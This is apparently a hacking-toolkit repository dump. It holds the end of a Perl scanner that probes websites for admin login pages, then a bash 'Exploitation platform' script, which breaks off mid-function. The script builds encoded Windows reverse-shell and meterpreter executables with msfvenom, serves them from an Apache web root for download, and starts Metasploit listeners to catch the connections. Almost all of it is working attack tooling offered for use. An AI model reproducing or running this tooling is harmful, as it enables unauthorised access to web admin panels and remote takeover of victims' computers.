=~ /Admin Password/ 347 | ){ 348 | print " \n [+√]Found page[√] -> $final\n\n\n"; 349 | }else{ 350 | print "[-x] Not Found :( <- $final\n"; 351 | } 352 | } 353 | } 354 | 355 | if($code eq "6"){ 356 | 357 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 358 | 'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi', 359 | 'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 360 | 'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html', 361 | 'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 362 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 363 | 'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi', 364 | 'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi', 365 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi', 366 | 'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi', 367 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html', 368 | 'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html', 369 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 370 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 371 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html', 372 | 'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi', 373 | 'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi', 374 | 'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi', 375 | 'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi' 376 | ); 377 | 378 | foreach $ways(@path2){ 379 | 380 | $final=$site.$ways; 381 | 382 | my $req=HTTP::Request->new(GET=>$final); 383 | my $ua=LWP::UserAgent->new(); 384 | $ua->timeout(30); 385 | my $response=$ua->request($req); 386 | 387 | if($response->content =~ /Username/ || 388 | $response->content =~ /Password/ || 389 | $response->content =~ /username/ || 390 | $response->content =~ /password/ || 391 | $response->content =~ /USERNAME/ || 392 | $response->content =~ /PASSWORD/ || 393 | $response->content =~ /Username/ || 394 | $response->content =~ /Wachtwoord/ || 395 | $response->content =~ /Senha/ || 396 | $response->content =~ /senha/ || 397 | $response->content =~ /Personal/ || 398 | $response->content =~ /Usuario/ || 399 | $response->content =~ /Clave/ || 400 | $response->content =~ /Usager/ || 401 | $response->content =~ /usager/ || 402 | $response->content =~ /Sing/ || 403 | $response->content =~ /passe/ || 404 | $response->content =~ /P\/W/ || 405 | $response->content =~ /Admin Password/ 406 | ){ 407 | print " \n [+√]Found page[√] -> $final\n\n\n"; 408 | }else{ 409 | print "[-x] Not Found :( <- $final\n"; 410 | } 411 | } 412 | } 413 | 414 | 415 | if($code eq "7"){ 416 | 417 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 418 | 'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf', 419 | 'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 420 | 'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html', 421 | 'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 422 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 423 | 'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf', 424 | 'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf', 425 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf', 426 | 'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf', 427 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html', 428 | 'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html', 429 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 430 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 431 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html', 432 | 'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf', 433 | 'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf', 434 | 'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf', 435 | 'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf' 436 | ); 437 | 438 | foreach $ways(@path2){ 439 | 440 | $final=$site.$ways; 441 | 442 | my $req=HTTP::Request->new(GET=>$final); 443 | my $ua=LWP::UserAgent->new(); 444 | $ua->timeout(30); 445 | my $response=$ua->request($req); 446 | 447 | if($response->content =~ /Username/ || 448 | $response->content =~ /Password/ || 449 | $response->content =~ /username/ || 450 | $response->content =~ /password/ || 451 | $response->content =~ /USERNAME/ || 452 | $response->content =~ /PASSWORD/ || 453 | $response->content =~ /Username/ || 454 | $response->content =~ /Wachtwoord/ || 455 | $response->content =~ /Senha/ || 456 | $response->content =~ /senha/ || 457 | $response->content =~ /Personal/ || 458 | $response->content =~ /Usuario/ || 459 | $response->content =~ /Clave/ || 460 | $response->content =~ /Usager/ || 461 | $response->content =~ /usager/ || 462 | $response->content =~ /Sing/ || 463 | $response->content =~ /passe/ || 464 | $response->content =~ /P\/W/ || 465 | $response->content =~ /Admin Password/ 466 | ){ 467 | print " \n [+√]Found page[√] -> $final\n\n\n"; 468 | }else{ 469 | print "[-x] Not Found :( <- $final\n"; 470 | } 471 | } 472 | } 473 | 474 | ############################################################## 475 | ##################### ######################### 476 | ##################### END OF Module ######################### 477 | ##################### ######################### 478 | ############################################################## 479 | #This Module by Oseid Aldary 480 | #Have a nice day :) 481 | #GoodBye 482 | 483 | -------------------------------------------------------------------------------- /Exploitation-platform.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ############################################################# 4 | # --------------------- # 5 | # check if user is root # 6 | # --------------------- # 7 | if [ $(id -u) != "0" ]; then # 8 | echo "[*!] we need to be root to run this tool !... " # 9 | echo "[*!] type [ sudo ./DHH.sh ] on your terminal" # 10 | exit 0 # 11 | else # 12 | echo "root user" > /dev/null 2>&1 # 13 | fi # 14 | # 15 | ############################################################# 16 | 17 | ########## Configure colors ########### 18 | # 19 | RED=$(tput setaf 1 && tput bold) # 20 | GREEN=$(tput setaf 2 && tput bold) # 21 | white=$(tput sgr0) # 22 | BLUE=$(tput setaf 6 && tput bold) # 23 | # 24 | ####################################### 25 | clear 26 | echo $BLUE 27 | echo "Please wait..............." 28 | echo 29 | hh=`echo ~` 30 | path=`pwd` 31 | myip=$(ip route show | awk '(NR == 2) {print $9}') 32 | GAT=`ip route | grep "static" | awk {'print $3'}` 33 | In=`netstat -r | grep "default" | awk {'print $8'}` 34 | Qu=$(zenity --question --title "Do you use this interface ?" --text "-:[ $In ? ]:-" --width 300) > /dev/null 2>&1 35 | if [ "$?" -eq "0" ]; then 36 | inter="$In" 37 | 38 | else 39 | 40 | zenity --info --title="INTERFACE -> ABORTED" --text "Please check your network connection\nor manually input your interface in use" --width 350 > /dev/null 2>&1 41 | echo ${GREEN}[*]${RED}:${GREEN}[Available Network Interfaces]: ${RED}; 42 | echo "" 43 | cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d' 44 | echo "" 45 | inter=$(zenity --title="Enter interface in use" --text "example: wlan0 Or eth0" --entry --width 300) > /dev/null 2>&1 46 | 47 | fi 48 | 49 | 50 | 51 | 52 | EE=YES 53 | 54 | if [ $EE = NO ];then 55 | myip2=Security 56 | else 57 | myip2=`wget -q -O - checkip.dyndns.org | sed -e 's/[^[:digit:]|.]//g'` 58 | fi 59 | 60 | clear 61 | echo "" $BLUE 62 | echo "checking if $RED[METASPLOIT]$BLUE exists$RED........" 63 | sleep 2 64 | echo 65 | if [ -f /usr/bin/msfconsole ];then 66 | echo "$BLUE[*]$RED:$BLUE[Metasploit]:${white}installation found...$BLUE" 67 | sleep 2 68 | else 69 | echo 70 | echo "$RED[!]${GREEN}Metasploit is not installation " 71 | echo 72 | echo $RED[x]:[waring]:${BLUE}this module needs $RED[Metasploit]$BLUE to work 73 | echo ""$GREEN 74 | echo "" 75 | echo -n "Do you want install Metasploit ?$RED [Y/N] :$BLUE " 76 | read meta 77 | if [[ $meta = Y || $meta = y ]];then 78 | clear 79 | echo 80 | echo $RED 81 | echo "=========== install Metasploit for you ===========" 82 | sleep 4 83 | echo "[*]working........." 84 | sleep 1 85 | apt-get -y install metasploit-framework 86 | echo 87 | echo $GREEN"Done! Metasploit has been installed !" 88 | echo 89 | read -p "now press Enter to continue :)" 90 | clear 91 | else 92 | if [[ $meta = N || $meta = n ]];then 93 | clear 94 | ./DHH.sh 95 | fi 96 | fi 97 | fi 98 | echo ""$BLUE 99 | echo "checking if $RED[MSFVENOM]$BLUE exists$RED........" 100 | sleep 2 101 | echo 102 | if [ -f /usr/bin/msfvenom ];then 103 | echo $BLUE[*]$RED:$BLUE[Msfvenom]:${white}installation found...$BLUE 104 | sleep 1 105 | 106 | else 107 | echo 108 | echo "$RED[!]${GREEN}Msfvenom is not installation " 109 | echo 110 | echo $RED[x]:[waring]:${BLUE}this module needs $RED[Msfvenom]$BLUE to work 111 | echo 112 | echo $BLUE[*]$RED:${BLUE}please install $RED[Msfvenom]$BLUE and try again ":)" 113 | sleep 4 114 | exit 115 | 116 | 117 | fi 118 | echo 119 | echo "checking if $RED[APACHE SERVER]$BLUE exists$RED........" 120 | echo 121 | sleep 2 122 | if [ -d /var/www/html ];then 123 | echo $BLUE[*]$RED:$BLUE[Apache]:${white}installation found... 124 | sleep 1 125 | else 126 | 127 | echo 128 | echo "$RED[!]${GREEN}Apache Server is not installation " 129 | echo 130 | echo $RED[x]:[waring]:${BLUE}this module needs $RED[Apache server]$BLUE to work 131 | echo 132 | echo 133 | echo -n "Do you want install Apache Server ?$RED [Y/N] :$BLUE " 134 | read apac 135 | if [[ $apac = Y || $apac = y ]];then 136 | clear 137 | echo 138 | echo $RED 139 | echo "=========== install Apache Server for you ===========" 140 | sleep 4 141 | echo "[*]working........." 142 | sleep 1 143 | apt-get -y install apache2 144 | echo 145 | echo $GREEN"Done! Apache Server has been installed !" 146 | echo 147 | read -p "now press Enter to continue :)" 148 | clear 149 | else 150 | if [[ $apac = N || $apac = n ]];then 151 | clear 152 | ./DHH.sh 153 | fi 154 | fi 155 | fi 156 | echo "" $BLUE 157 | echo "checking $RED[internet]$BLUE connections$RED........" 158 | sleep 2 159 | ping -i 01 -c 1 google.com > /dev/null 2>&1 160 | if [ "$?" != 0 ] 161 | then 162 | sleep 3 163 | clear 164 | echo 165 | echo "$RED[!]$BLUE You Are Not Connect To The Internet" 166 | echo 167 | echo "$RED[*]warning[ $GREEN This Modules need to connect to the internet$RED ] "$BLUE 168 | echo 169 | echo -n "Do You Want continue without the Internet !?$RED [Y/N]$GREEN : " 170 | read net 171 | if [[ $net = N || $net = n ]];then 172 | clear 173 | echo 174 | echo "" $BLUE 175 | echo "[!]Please Connect To The Internet And Try Again :) " 176 | echo 177 | exit 178 | else 179 | if [[ $net = Y || $net = y ]];then 180 | clear 181 | myip=? 182 | myip2=? 183 | In=? 184 | GAT=? 185 | fi 186 | fi 187 | else 188 | echo 189 | echo $BLUE[*]$RED:$BLUE[Internet]:$GREEN[CONNECT Fonud$white...$GREEN] 190 | sleep 1 191 | echo 192 | echo "" $GREEN 193 | echo "Welcome to $RED[-> [ Exploitation platform ] <-]" 194 | sleep 3 195 | fi 196 | 197 | clear 198 | 199 | winre () { 200 | clear 201 | echo 202 | echo 203 | echo "please wait.......... " 204 | sleep 2 205 | clear 206 | echo ""$BLUE 207 | echo "------------------------------------------" 208 | echo "Your Local IP Address:[ $myip " 209 | echo " " 210 | echo "Your Public IP Address:[ $myip2 " 211 | echo " " 212 | echo "------------------------------------------" 213 | echo "" $GREEN 214 | echo -n "Enter LHOST=$RED" 215 | read host 216 | echo ""$GREEN 217 | sleep 1 218 | echo "LHOST==>$BLUE $host "$GREEN 219 | echo 220 | echo "===========================" 221 | sleep 1 222 | echo 223 | echo -n "Enter LPORT=$RED" 224 | read port 225 | echo $GREEN 226 | sleep 1 227 | echo "LPORT==>$BLUE $port"$GREEN 228 | echo 229 | echo "===========================" 230 | sleep 1 231 | echo 232 | echo -n "Enter name for payload=$RED" 233 | read name 234 | echo $GREEN 235 | sleep 1 236 | echo "NAME==>$BLUE $name "$GREEN 237 | echo 238 | echo "===========================" 239 | sleep 1 240 | echo 241 | clear 242 | echo 243 | echo 244 | echo " Payload [exe] Final Config: " 245 | echo "===================================" 246 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 247 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 248 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 249 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/meterpreter/reverse_tcp $GREEN " 250 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 251 | sleep 3 252 | cd $hh/Desktop/ 253 | if [ -d Output ];then 254 | echo 255 | echo "Found Output " 256 | sleep 1 257 | else 258 | mkdir Output 259 | fi 260 | cd .. 261 | wind=.exe 262 | echo 263 | echo 264 | sleep 1 265 | echo 266 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 267 | sleep 1 268 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 269 | echo 270 | echo $BLUE"[*]$RED:$GREEN Done! " 271 | sleep 1 272 | echo 273 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 274 | cd $hh/Desktop/Output/ 275 | chmod +x $name$wind 276 | cp $name$wind /var/www/html 277 | echo 278 | echo "Done ! " 279 | sleep 2 280 | echo "" $GREEN 281 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 282 | sleep 2 283 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 284 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 285 | sleep 2 286 | echo 287 | echo "[*]Done apache server has been started " 288 | sleep 2 289 | echo 290 | echo 291 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 292 | echo 293 | echo 294 | sleep 7 295 | clear 296 | echo 297 | echo 298 | echo $BLUE" WHAT YOU WANT " 299 | echo $BLUE"================= " 300 | echo 301 | echo "1 - create Listener on [$GREEN $name $BLUE]" 302 | echo "2 - back to the menu " $GREEN 303 | echo 304 | echo -n "Enter choice ->> "$RED 305 | read choice 306 | if [ $choice = 1 ];then 307 | clear 308 | echo 309 | echo 310 | echo "starting Listener on $BLUE[ $name ]" 311 | sleep 1 312 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/meterpreter/reverse_tcp; exploit -j'" 313 | else 314 | 315 | if [ $choice = 2 ];then 316 | clear 317 | fi 318 | fi 319 | 320 | } 321 | 322 | winhtt () { 323 | clear 324 | echo 325 | echo 326 | echo "please wait.......... " 327 | sleep 2 328 | clear 329 | echo ""$BLUE 330 | echo "------------------------------------------" 331 | echo "Your Local IP Address:[ $myip " 332 | echo " " 333 | echo "Your Public IP Address:[ $myip2 " 334 | echo " " 335 | echo "------------------------------------------" 336 | echo "" $GREEN 337 | echo -n "Enter LHOST=$RED" 338 | read host 339 | echo ""$GREEN 340 | sleep 1 341 | echo "LHOST==>$BLUE $host "$GREEN 342 | echo 343 | echo "===========================" 344 | sleep 1 345 | echo 346 | echo -n "Enter LPORT=$RED" 347 | read port 348 | echo $GREEN 349 | sleep 1 350 | echo "LPORT==>$BLUE $port"$GREEN 351 | echo 352 | echo "===========================" 353 | sleep 1 354 | echo 355 | echo -n "Enter name for payload=$RED" 356 | read name 357 | echo $GREEN 358 | sleep 1 359 | echo "NAME==>$BLUE $name "$GREEN 360 | echo 361 | echo "===========================" 362 | sleep 1 363 | echo 364 | clear 365 | echo 366 | echo 367 | echo " Payload [exe] Final Config: " 368 | echo "===================================" 369 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 370 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 371 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 372 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/meterpreter/reverse_http $GREEN " 373 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 374 | sleep 3 375 | cd $hh/Desktop/ 376 | if [ -d Output ];then 377 | echo 378 | echo "Found Output " 379 | sleep 1 380 | else 381 | mkdir Output 382 | fi 383 | cd .. 384 | wind=.exe 385 | echo 386 | echo 387 | sleep 1 388 | echo 389 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 390 | sleep 1 391 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/meterpreter/reverse_http -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 392 | echo 393 | echo $BLUE"[*]$RED:$GREEN Done! " 394 | sleep 1 395 | echo 396 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 397 | cd $hh/Desktop/Output/ 398 | chmod +x $name$wind 399 | cp $name$wind /var/www/html 400 | echo 401 | echo "Done ! " 402 | sleep 2 403 | echo "" $GREEN 404 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 405 | sleep 2 406 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 407 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 408 | sleep 2 409 | echo 410 | echo "[*]Done apache server has been started " 411 | sleep 2 412 | echo 413 | echo 414 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 415 | echo 416 | echo 417 | sleep 7 418 | clear 419 | echo 420 | echo 421 | echo $BLUE" WHAT YOU WANT " 422 | echo $BLUE"================= " 423 | echo 424 | echo "1 - create Listener on [$GREEN $name $BLUE]" 425 | echo "2 - back to the menu " $GREEN 426 | echo 427 | echo -n "Enter choice ->> "$RED 428 | read choice 429 | if [ $choice = 1 ];then 430 | clear 431 | echo 432 | echo 433 | echo "starting Listener on $BLUE[ $name ]" 434 | sleep 1 435 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/meterpreter/reverse_http; exploit -j'" 436 | 437 | else 438 | 439 | if [ $choice = 2 ];then 440 | clear 441 | fi 442 | fi 443 | 444 | } 445 | 446 | exie () { 447 | exie 448 | 449 | } 450 | 451 | winhttps () { 452 | clear 453 | echo 454 | echo 455 | echo "please wait.......... " 456 | sleep 2 457 | clear 458 | echo ""$BLUE 459 | echo "------------------------------------------" 460 | echo "Your Local IP Address:[ $myip " 461 | echo " " 462 | echo "Your Public IP Address:[ $myip2 " 463 | echo " " 464 | echo "------------------------------------------" 465 | echo "" $GREEN 466 | echo -n "Enter LHOST=$RED" 467 | read host 468 | echo ""$GREEN 469 | sleep 1 470 | echo "LHOST==>$BLUE $host "$GREEN 471 | echo 472 | echo "===========================" 473 | sleep 1 474 | echo 475 | echo -n "Enter LPORT=$RED" 476 | read port 477 | echo $GREEN 478 | sleep 1 479 | echo "LPORT==>$BLUE $port"$GREEN 480 | echo 481 | echo "===========================" 482 | sleep 1 483 | echo 484 | echo -n "Enter name for payload=$RED" 485 | read name 486 | echo $GREEN 487 | sleep 1 488 | echo "NAME==>$BLUE $name "$GREEN 489 | echo 490 | echo "===========================" 491 | sleep 1 492 | echo 493 | clear 494 | echo 495 | echo 496 | echo " Payload [exe] Final Config: " 497 | echo "===================================" 498 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 499 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 500 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 501 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/meterpreter/reverse_https $GREEN " 502 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 503 | sleep 3 504 | cd $hh/Desktop/ 505 | if [ -d Output ];then 506 | echo 507 | echo "Found Output " 508 | sleep 1 509 | else 510 | mkdir Output 511 | fi 512 | cd .. 513 | wind=.exe 514 | echo 515 | echo 516 | sleep 1 517 | echo 518 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 519 | sleep 1 520 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 521 | echo 522 | echo $BLUE"[*]$RED:$GREEN Done! " 523 | sleep 1 524 | echo 525 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 526 | cd $hh/Desktop/Output/ 527 | chmod +x $name$wind 528 | cp $name$wind /var/www/html 529 | echo 530 | echo "Done ! " 531 | sleep 2 532 | echo "" $GREEN 533 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 534 | sleep 2 535 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 536 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 537 | sleep 2 538 | echo 539 | echo "[*]Done apache server has been started " 540 | sleep 2 541 | echo 542 | echo 543 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 544 | echo 545 | echo 546 | sleep 7 547 | clear 548 | echo 549 | echo 550 | echo $BLUE" WHAT YOU WANT " 551 | echo $BLUE"================= " 552 | echo 553 | echo "1 - create Listener on [$GREEN $name $BLUE]" 554 | echo "2 - back to the menu " $GREEN 555 | echo 556 | echo -n "Enter choice ->> "$RED 557 | read choice 558 | if [ $choice = 1 ];then 559 | clear 560 | echo 561 | echo 562 | echo "starting Listener on $BLUE[ $name ]" 563 | sleep 1 564 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/meterpreter/reverse_https; exploit -j'" 565 | 566 | else 567 | 568 | if [ $choice = 2 ];then 569 | clear 570 | fi 571 | fi 572 | 573 | } 574 | 575 | sheel () { 576 | clear 577 | echo 578 | echo 579 | echo "please wait.......... " 580 | sleep 2 581 | clear 582 | echo ""$BLUE 583 | echo "------------------------------------------" 584 | echo "Your Local IP Address:[ $myip " 585 | echo " " 586 | echo "Your Public IP Address:[ $myip2 " 587 | echo " " 588 | echo "------------------------------------------" 589 | echo "" $GREEN 590 | echo -n "Enter LHOST=$RED" 591 | read host 592 | echo ""$GREEN 593 | sleep 1 594 | echo "LHOST==>$BLUE $host "$GREEN 595 | echo 596 | echo "===========================" 597 | sleep 1 598 | echo 599 | echo -n "Enter LPORT=$RED" 600 | read port 601 | echo $GREEN 602 | sleep 1 603 | echo "LPORT==>$BLUE $port"$GREEN 604 | echo 605 | echo "===========================" 606 | sleep 1 607 | echo 608 | echo -n "Enter name for payload=$RED" 609 | read name 610 | echo $GREEN 611 | sleep 1 612 | echo "NAME==>$BLUE $name "$GREEN 613 | echo 614 | echo "===========================" 615 | sleep 1 616 | echo 617 | clear 618 | echo 619 | echo 620 | echo " Payload [exe] Final Config: " 621 | echo "===================================" 622 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 623 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 624 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 625 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/shell/reverse_tcp $GREEN " 626 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 627 | sleep 3 628 | cd $hh/Desktop/ 629 | if [ -d Output ];then 630 | echo 631 | echo "Found Output " 632 | sleep 1 633 | else 634 | mkdir Output 635 | fi 636 | cd .. 637 | wind=.exe 638 | echo 639 | echo 640 | sleep 1 641 | echo 642 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 643 | sleep 1 644 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 645 | echo 646 | echo $BLUE"[*]$RED:$GREEN Done! " 647 | sleep 1 648 | echo 649 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 650 | cd $hh/Desktop/Output/ 651 | chmod +x $name$wind 652 | cp $name$wind /var/www/html 653 | echo 654 | echo "Done ! " 655 | sleep 2 656 | echo "" $GREEN 657 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 658 | sleep 2 659 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 660 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 661 | sleep 2 662 | echo 663 | echo "[*]Done apache server has been started " 664 | sleep 2 665 | echo 666 | echo 667 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 668 | echo 669 | echo 670 | sleep 7 671 | clear 672 | echo 673 | echo 674 | echo $BLUE" WHAT YOU WANT " 675 | echo $BLUE"================= " 676 | echo 677 | echo "1 - create Listener on [$GREEN $name $BLUE]" 678 | echo "2 - back to the menu " $GREEN 679 | echo 680 | echo -n "Enter choice ->> "$RED 681 | read choice 682 | if [ $choice = 1 ];then 683 | clear 684 | echo 685 | echo 686 | echo "starting Listener on $BLUE[ $name ]" 687 | sleep 1 688 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/shell/reverse_tcp; exploit -j'" 689 | 690 | else 691 | 692 | if [ $choice = 2 ];then 693 | clear 694 | fi 695 | fi 696 | 697 | } 698 | 699 | sh_x64 () { 700 | clear 701 | echo 702 | echo 703 | echo "please wait.......... " 704 | sleep 2 705 | clear 706 | echo ""$BLUE 707 | echo "------------------------------------------" 708 | echo "Your Local IP Address:[ $myip " 709 | echo " " 710 | echo "Your Public IP Address:[ $myip2 " 711 | echo " " 712 | echo "------------------------------------------" 713 | echo "" $GREEN 714 | echo -n "Enter LHOST=$RED" 715 | read host 716 | echo ""$GREEN 717 | sleep 1 718 | echo "LHOST==>$BLUE $host "$GREEN 719 | echo 720 | echo "===========================" 721 | sleep 1 722 | echo 723 | echo -n "Enter LPORT=$RED" 724 | read port 725 | echo 